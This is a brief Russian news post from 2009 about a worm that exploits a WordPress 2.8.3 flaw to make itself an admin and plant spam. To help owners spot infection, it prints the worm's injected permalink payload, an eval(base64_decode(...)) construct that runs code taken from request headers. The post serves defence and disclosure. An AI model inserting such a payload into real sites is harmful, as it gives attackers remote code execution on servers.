23:49 08.09.2009 WordPress. Массовое заражение | |
Месяц назад стало известно о новой критической уязвимости в WordPress
2.8.3, позволяющей легко изменить администраторский пароль в удалённом
режиме. После этого вышел WordPress 2.8.4, устраняющий эту уязвимость.
Однако, как оказалось, далеко не все блогеры следят за обновлениями. В эти выходные разразилась настоящая эпидемия нового вируса,
поражающего блоги на движке WordPress 2.8.3 и более ранних версий в
ветке 2.8. Червь регистрируется в блоге, запускает вредоносный код через структуру
permalink и делает себя вторым админом, потом запускает скрипт для
стирания себя со страницы пользователей и начинает добавлять спам и
ссылки на вредоносный контент в архивные топики. Присутствие вредителя довольно сложно обнаружить сразу, тем более если
он ещё ничего не опубликовал. Для этого нужно проверить фид
permalinks/rss на присутствие следующего кода.
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ или “/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&% или ошибки ‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’ Если есть такой код или фид сломан, то блог инфицирован. Процедура удаления червя представляет собой нетривиальную задачу . | |
|
Всего комментариев: 0 | |